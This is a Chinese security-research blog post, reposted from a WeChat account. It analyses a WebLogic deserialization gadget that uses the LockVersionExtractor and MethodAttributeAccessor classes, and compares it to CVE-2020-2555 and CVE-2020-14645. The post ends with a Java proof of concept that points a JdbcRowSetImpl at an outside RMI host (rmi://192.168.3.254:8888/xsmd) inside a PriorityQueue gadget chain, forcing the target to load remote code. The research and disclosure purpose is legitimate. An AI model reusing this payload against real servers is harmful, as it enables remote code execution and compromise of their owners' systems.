簡介
經過diff 升級包中weblogic的黑名單,咱們發現新增oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor這個類java
LockVersionExtractor 分析
package oracle.eclipselink.coherence.integrated.internal.cache;
import com.tangosol.io.ExternalizableLite;
import com.tangosol.io.pof.PofReader;
import com.tangosol.io.pof.PofWriter;
import com.tangosol.io.pof.PortableObject;
import com.tangosol.util.ExternalizableHelper;
import com.tangosol.util.ValueExtractor;
import java.io.DataInput;
import java.io.DataOutput;
import java.io.IOException;
import oracle.eclipselink.coherence.integrated.cache.Wrapper;
import oracle.eclipselink.coherence.integrated.internal.querying.EclipseLinkExtractor;
import org.eclipse.persistence.mappings.AttributeAccessor;
public class LockVersionExtractor implements ValueExtractor, ExternalizableLite, PortableObject, EclipseLinkExtractor {
protected AttributeAccessor accessor;
protected String className;
public LockVersionExtractor() {
}
public LockVersionExtractor(AttributeAccessor accessor, String className) {
this.accessor = accessor;
this.className = className;
}
public Object extract(Object arg0) {
if (arg0 == null) {
return null;
} else {
if (arg0 instanceof Wrapper) {
arg0 = ((Wrapper)arg0).unwrap();
}
if (!this.accessor.isInitialized()) {
this.accessor.initializeAttributes(arg0.getClass());
}
return this.accessor.getAttributeValueFromObject(arg0);
}
}
咱們能夠從代碼上看出來,相似與 cve-2020-2555,用法也都是同樣的。觸發漏洞的重點在於this.accessor.getAttributeValueFromObject 中。下面選取一個可能的執行路徑web
package org.eclipse.persistence.internal.descriptors;
public class MethodAttributeAccessor extends AttributeAccessor {
protected String setMethodName = "";
protected String getMethodName;
protected transient Method setMethod;
protected transient Method getMethod;
public Object getAttributeValueFromObject(Object anObject) throws DescriptorException {
return this.getAttributeValueFromObject(anObject, (Object[])null);
}
protected Object getAttributeValueFromObject(Object anObject, Object[] parameters) throws DescriptorException {
try {
if (PrivilegedAccessHelper.shouldUsePrivilegedAccess()) {
try {
return AccessController.doPrivileged(new PrivilegedMethodInvoker(this.getGetMethod(), anObject, parameters));
} catch (PrivilegedActionException var5) {
Exception throwableException = var5.getException();
if (throwableException instanceof IllegalAccessException) {
throw DescriptorException.illegalAccessWhileGettingValueThruMethodAccessor(this.getGetMethodName(), anObject.getClass().getName(), throwableException);
} else {
throw DescriptorException.targetInvocationWhileGettingValueThruMethodAccessor(this.getGetMethodName(), anObject.getClass().getName(), throwableException);
}
}
} else {
return this.getMethod.invoke(anObject, parameters);
}
MethodAttributeAccessor中getAttributeValueFromObject函數缺點在於,只能執行無參的函數,從這點來看,咱們很容易的與七月份 cve-2020-14645 聯想起來安全
因此照貓畫虎 poc以下微信
POC
// JdbcRowSetImpl
JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
jdbcRowSet.setDataSourceName("rmi://192.168.3.254:8888/xsmd");
MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
methodAttributeAccessor.setIsWriteOnly(true);
methodAttributeAccessor.setAttributeName("UnicodeSec");
LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "UnicodeSec");
final ExtractorComparator comparator = new ExtractorComparator(extractor);
final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
Object[] q = new Object[]{jdbcRowSet, jdbcRowSet};
Reflections.setFieldValue(queue, "queue", q);
Reflections.setFieldValue(queue, "size", 2);
Field comparatorF = queue.getClass().getDeclaredField("comparator");
comparatorF.setAccessible(true);
comparatorF.set(queue, new ExtractorComparator(extractor));
怕什麼真理無窮,進一寸有進一寸的歡喜oracle
本文分享自微信公衆號 - 一個安全研究員(sec_tntaxin)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。app